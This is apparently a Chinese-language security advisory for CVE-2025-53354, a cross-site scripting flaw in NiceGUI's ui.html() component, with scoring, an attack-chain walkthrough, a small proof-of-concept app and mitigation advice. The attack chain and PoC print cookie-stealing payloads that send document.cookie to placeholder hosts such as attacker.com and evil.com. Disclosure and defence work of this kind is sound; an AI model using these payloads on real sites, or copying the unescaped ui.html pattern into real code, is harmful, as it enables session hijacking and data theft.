CVE-2025-53354：NiceGUI跨站脚本（XSS）漏洞

漏洞信息

漏洞编号

CVE-2025-53354

漏洞类型

跨站脚本（XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

NiceGUI

漏洞概述

CVE-2025-53354是NiceGUI（一个基于Python的UI框架）中存在的跨站脚本（Cross-Site Scripting, XSS）漏洞。该漏洞影响NiceGUI 2.24.2及以下版本，当开发人员使用ui.html()组件将未转义的用户输入直接渲染到DOM时，攻击者可以利用此漏洞在受害者的浏览器中执行任意JavaScript代码。NiceGUI框架本身未对通过ui.html()传入的内容执行HTML或JavaScript清理/转义操作，这使得直接将ui.input()与ui.html()组合使用，或将未转义的用户输入传入ui.chat_message等组件的HTML内容的应用程序面临XSS攻击风险。该漏洞的CVSS 3.1评分为6.1分，属于中危级别，攻击向量为网络（AV:N），无需认证（PR:N），但需要用户交互（UI:R），机密性和完整性影响均为低（C:L/I:L），可用性影响为无（A:N）。该漏洞已于NiceGUI 3.0.0版本中修复，开发者通过升级到最新版本即可消除此安全风险。对于未将不受信任的输入传递给ui.html()的应用程序，则不受此漏洞影响。

技术细节

NiceGUI是一个基于Python的UI框架，允许开发者使用Python代码构建Web用户界面。该框架提供了ui.html()组件用于直接渲染HTML内容到DOM中。然而，在2.24.2及以下版本中，ui.html()未对传入的内容进行任何HTML或JavaScript转义或清理操作。

漏洞原理：当开发者将用户可控的输入（如来自ui.input()组件的用户输入）直接传递给ui.html()进行渲染时，攻击者可以通过构造包含恶意JavaScript代码的输入（如<script>alert('XSS')</script>或<img src=x onerror=...>等载荷）来触发XSS。由于ui.html()直接将原始HTML插入到DOM中，浏览器会解析并执行其中的恶意脚本。

利用方式：攻击者需要诱导用户访问包含恶意输入的页面或应用，例如通过社会工程学手段让用户在受影响的NiceGUI应用中输入恶意HTML/JavaScript代码。当用户提交包含恶意载荷的内容后，若应用程序将用户输入直接通过ui.html()渲染显示，则恶意脚本将在受害者的浏览器上下文中执行。攻击者可以窃取用户的会话Cookie、劫持用户会话、篡改页面内容、进行钓鱼攻击或将受害者重定向到恶意网站。

修复方案：NiceGUI 3.0.0版本对ui.html()组件进行了安全强化，强制对传入内容进行HTML/JS转义处理，从根本上防止未转义内容被注入到DOM中。

攻击链分析

STEP 1

步骤1：识别目标

攻击者发现目标应用程序使用了NiceGUI 2.24.2或以下版本构建，并且应用程序中存在将用户输入直接通过ui.html()渲染的功能点（如聊天消息、表单预览、富文本展示等）。

STEP 2

步骤2：构造恶意载荷

攻击者构造包含恶意JavaScript代码的HTML载荷，例如<img src=x onerror="恶意代码">或<script>document.location='http://attacker.com/?c='+document.cookie</script>，准备通过用户输入字段提交。

STEP 3

步骤3：投递恶意输入

攻击者通过社会工程学手段（如钓鱼链接、诱导用户输入等）让受害者在目标应用的输入字段中提交恶意HTML/JS载荷。

STEP 4

步骤4：触发XSS执行

当应用程序将用户输入通过ui.html()渲染到DOM时，由于未进行转义处理，浏览器解析并执行恶意脚本，攻击者的JavaScript代码在受害者的浏览器上下文中运行。

STEP 5

步骤5：实施恶意行为

恶意脚本执行后，攻击者可以窃取用户的会话Cookie、会话令牌，进行会话劫持，篡改页面内容，实施钓鱼攻击，或将受害者重定向到恶意网站，进一步窃取敏感信息或传播恶意软件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-53354 - NiceGUI XSS Vulnerability PoC
# This PoC demonstrates the XSS vulnerability in NiceGUI <= 2.24.2
# when untrusted user input is rendered via ui.html() without sanitization.

from nicegui import ui

@ui.page('/')
def main_page():
    ui.label('NiceGUI XSS Demo (CVE-2025-53354)')

    # User input field - attacker controls the content
    user_input = ui.input(label='Enter your message')

    # VULNERABLE: ui.html() renders raw HTML/JS without sanitization
    # An attacker can inject: <script>alert('XSS')</script>
    # or: <img src=x onerror="document.location='http://evil.com/steal?c='+document.cookie">
    def render():
        ui.html(f'<div>Your message: {user_input.value}</div>')

    ui.button('Submit', on_click=render)

# Attack payload examples:
# Payload 1 (Basic XSS): <script>alert('XSS-Vulnerable')</script>
# Payload 2 (Cookie theft): <img src=x onerror="fetch('http://attacker.com/steal?c='+document.cookie)">
# Payload 3 (Session hijack): <script>document.location='http://attacker.com/'+document.cookie</script>

ui.run(port=8080)

影响范围

NiceGUI <= 2.24.2

防御指南

临时缓解措施

在无法立即升级到NiceGUI 3.0.0的情况下，建议采取以下临时缓解措施：1）审查所有使用ui.html()的代码路径，确保不将任何用户可控输入直接传递给该组件；2）在将用户输入传递给ui.html()之前，使用Python的html.escape()函数或bleach库对内容进行HTML转义和清理；3）部署Web应用防火墙（WAF）规则，拦截包含<script>、onerror等XSS特征的请求；4）实施严格的内容安全策略（CSP），限制内联脚本执行；5）对用户输入进行白名单验证，仅允许安全的HTML标签和属性。